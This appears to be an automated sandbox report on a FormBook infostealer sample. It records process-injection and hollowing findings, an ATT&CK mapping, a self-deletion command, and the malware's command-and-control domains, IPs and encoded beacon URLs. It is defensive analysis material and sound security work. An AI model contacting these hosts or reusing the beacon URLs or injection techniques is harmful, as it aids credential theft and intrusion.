          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B40E1 mov eax, dword ptr fs:[00000030h]4_2_045B40E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B40E1 mov eax, dword ptr fs:[00000030h]4_2_045B40E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B40E1 mov eax, dword ptr fs:[00000030h]4_2_045B40E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9080 mov eax, dword ptr fs:[00000030h]4_2_045B9080
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EF0BF mov ecx, dword ptr fs:[00000030h]4_2_045EF0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EF0BF mov eax, dword ptr fs:[00000030h]4_2_045EF0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EF0BF mov eax, dword ptr fs:[00000030h]4_2_045EF0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04633884 mov eax, dword ptr fs:[00000030h]4_2_04633884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04633884 mov eax, dword ptr fs:[00000030h]4_2_04633884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F90AF mov eax, dword ptr fs:[00000030h]4_2_045F90AF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]4_2_045E20A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]4_2_045E20A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]4_2_045E20A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]4_2_045E20A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]4_2_045E20A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]4_2_045E20A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DB944 mov eax, dword ptr fs:[00000030h]4_2_045DB944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DB944 mov eax, dword ptr fs:[00000030h]4_2_045DB944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB171 mov eax, dword ptr fs:[00000030h]4_2_045BB171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB171 mov eax, dword ptr fs:[00000030h]4_2_045BB171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC962 mov eax, dword ptr fs:[00000030h]4_2_045BC962
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9100 mov eax, dword ptr fs:[00000030h]4_2_045B9100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9100 mov eax, dword ptr fs:[00000030h]4_2_045B9100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9100 mov eax, dword ptr fs:[00000030h]4_2_045B9100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E513A mov eax, dword ptr fs:[00000030h]4_2_045E513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E513A mov eax, dword ptr fs:[00000030h]4_2_045E513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov eax, dword ptr fs:[00000030h]4_2_045D4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov eax, dword ptr fs:[00000030h]4_2_045D4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov eax, dword ptr fs:[00000030h]4_2_045D4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov eax, dword ptr fs:[00000030h]4_2_045D4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov ecx, dword ptr fs:[00000030h]4_2_045D4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046441E8 mov eax, dword ptr fs:[00000030h]4_2_046441E8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB1E1 mov eax, dword ptr fs:[00000030h]4_2_045BB1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB1E1 mov eax, dword ptr fs:[00000030h]4_2_045BB1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB1E1 mov eax, dword ptr fs:[00000030h]4_2_045BB1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046749A4 mov eax, dword ptr fs:[00000030h]4_2_046749A4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046749A4 mov eax, dword ptr fs:[00000030h]4_2_046749A4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046749A4 mov eax, dword ptr fs:[00000030h]4_2_046749A4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046749A4 mov eax, dword ptr fs:[00000030h]4_2_046749A4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046369A6 mov eax, dword ptr fs:[00000030h]4_2_046369A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2990 mov eax, dword ptr fs:[00000030h]4_2_045E2990
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA185 mov eax, dword ptr fs:[00000030h]4_2_045EA185
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046351BE mov eax, dword ptr fs:[00000030h]4_2_046351BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046351BE mov eax, dword ptr fs:[00000030h]4_2_046351BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046351BE mov eax, dword ptr fs:[00000030h]4_2_046351BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046351BE mov eax, dword ptr fs:[00000030h]4_2_046351BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DC182 mov eax, dword ptr fs:[00000030h]4_2_045DC182
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E61A0 mov eax, dword ptr fs:[00000030h]4_2_045E61A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E61A0 mov eax, dword ptr fs:[00000030h]4_2_045E61A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466B260 mov eax, dword ptr fs:[00000030h]4_2_0466B260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466B260 mov eax, dword ptr fs:[00000030h]4_2_0466B260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688A62 mov eax, dword ptr fs:[00000030h]4_2_04688A62
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9240 mov eax, dword ptr fs:[00000030h]4_2_045B9240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9240 mov eax, dword ptr fs:[00000030h]4_2_045B9240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9240 mov eax, dword ptr fs:[00000030h]4_2_045B9240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9240 mov eax, dword ptr fs:[00000030h]4_2_045B9240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F927A mov eax, dword ptr fs:[00000030h]4_2_045F927A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467EA55 mov eax, dword ptr fs:[00000030h]4_2_0467EA55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04644257 mov eax, dword ptr fs:[00000030h]4_2_04644257
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D3A1C mov eax, dword ptr fs:[00000030h]4_2_045D3A1C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B5210 mov eax, dword ptr fs:[00000030h]4_2_045B5210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B5210 mov ecx, dword ptr fs:[00000030h]4_2_045B5210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B5210 mov eax, dword ptr fs:[00000030h]4_2_045B5210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B5210 mov eax, dword ptr fs:[00000030h]4_2_045B5210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BAA16 mov eax, dword ptr fs:[00000030h]4_2_045BAA16
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BAA16 mov eax, dword ptr fs:[00000030h]4_2_045BAA16
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C8A0A mov eax, dword ptr fs:[00000030h]4_2_045C8A0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AA16 mov eax, dword ptr fs:[00000030h]4_2_0467AA16
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AA16 mov eax, dword ptr fs:[00000030h]4_2_0467AA16
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.qq66520.com
          Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.129.33 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 166.88.88.176 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.killrstudio.com
          Source: C:\Windows\explorer.exeDomain query: www.thenorthgoldline.com
          Source: C:\Windows\explorer.exeDomain query: www.ivoirepneus.com
          Source: C:\Windows\explorer.exeDomain query: www.extinctionbrews.com
          Source: C:\Windows\explorer.exeDomain query: www.doityourselfism.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.79.124.173 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.invisiongc.net
          Source: C:\Windows\explorer.exeDomain query: www.mzyxi-rkah-y.net
          Source: C:\Windows\explorer.exeDomain query: www.guys-only.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.196.232.108 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 169.62.77.158 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.avito-payment.life
          Source: C:\Windows\explorer.exeDomain query: www.cindywillardrealtor.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.221 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.saludflv.info
          Source: C:\Windows\explorer.exeDomain query: www.builtbydawn.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection loaded: unknown target: C:\Users\user\Desktop\PQMW0W5h3X.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 140000Jump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000000.364488507.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.337208045.00000000008B8000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.364488507.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000003.00000000.364488507.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery131Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 438543 Sample: PQMW0W5h3X.exe Startdate: 22/06/2021 Architecture: WINDOWS Score: 100 29 www.wideawakemomma.com 2->29 31 wideawakemomma.com 2->31 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 7 other signatures 2->55 9 PQMW0W5h3X.exe 19 2->9         started        13 explorer.exe 2->13         started        signatures3 process4 dnsIp5 25 C:\Users\user\AppData\Local\...\System.dll, PE32 9->25 dropped 27 C:\Users\user\AppData\...\axjnwhbrvqsxuek, DOS 9->27 dropped 57 Detected unpacking (changes PE section rights) 9->57 59 Maps a DLL or memory area into another process 9->59 61 Tries to detect virtualization through RDTSC time measurements 9->61 16 PQMW0W5h3X.exe 9->16         started        33 doityourselfism.com 169.62.77.158, 49761, 80 SOFTLAYERUS United States 13->33 35 www.ivoirepneus.com 213.186.33.5, 49758, 80 OVHFR France 13->35 37 17 other IPs or domains 13->37 63 System process connects to network (likely due to code injection or exploit) 13->63 19 rundll32.exe 13->19         started        file6 signatures7 process8 signatures9 39 Modifies the context of a thread in another process (thread injection) 16->39 41 Maps a DLL or memory area into another process 16->41 43 Sample uses process hollowing technique 16->43 45 Queues an APC in another process (thread injection) 16->45 47 Tries to detect virtualization through RDTSC time measurements 19->47 21 cmd.exe 1 19->21         started        process10 process11 23 conhost.exe 21->23         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PQMW0W5h3X.exe17%VirustotalBrowse
          PQMW0W5h3X.exe22%ReversingLabs
          PQMW0W5h3X.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.PQMW0W5h3X.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.PQMW0W5h3X.exe.22c0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.rundll32.exe.4d4be0.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.0.PQMW0W5h3X.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          2.1.PQMW0W5h3X.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.rundll32.exe.4ac7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.PQMW0W5h3X.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          2.2.PQMW0W5h3X.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.guys-only.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY00%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.doityourselfism.com/dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY00%Avira URL Cloudsafe
          http://www.invisiongc.net/dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==0%Avira URL Cloudsafe
          http://www.killrstudio.com/dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY00%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.thenorthgoldline.com/dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w==0%Avira URL Cloudsafe
          http://www.wideawakemomma.com/dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw==0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.extinctionbrews.com/dy8g/0%Avira URL Cloudsafe
          http://www.ivoirepneus.com/dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw==0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.cindywillardrealtor.com/dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg==0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.guys-only.com/dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY00%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.extinctionbrews.com/dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY00%Avira URL Cloudsafe
          http://www.qq66520.com/dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.mzyxi-rkah-y.net
          		52.79.124.173
          		truetrue
            		unknown
            www.guys-only.com
            		154.196.232.108
            		truetrueunknown
            www.qq66520.com
            		166.88.88.176
            		truetrue
              		unknown
              extinctionbrews.com
              		34.102.136.180
              		truefalse
                		unknown
                wideawakemomma.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.ivoirepneus.com
                  		213.186.33.5
                  		truetrue
                    		unknown
                    invisiongc.net
                    		34.102.136.180
                    		truefalse
                      		unknown
                      killrstudio.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        www.builtbydawn.com
                        		172.67.129.33
                        		truetrue
                          		unknown
                          cindywillardrealtor.com
                          		34.102.136.180
                          		truefalse
                            		unknown
                            doityourselfism.com
                            		169.62.77.158
                            		truetrue
                              		unknown
                              825610.parkingcrew.net
                              		75.2.81.221
                              		truefalse
                                		high
                                www.killrstudio.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.thenorthgoldline.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.extinctionbrews.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.doityourselfism.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.invisiongc.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.avito-payment.life
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.cindywillardrealtor.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.wideawakemomma.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.saludflv.info
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0true
                                                  • Avira URL Cloud: safe
                                                  		unknown
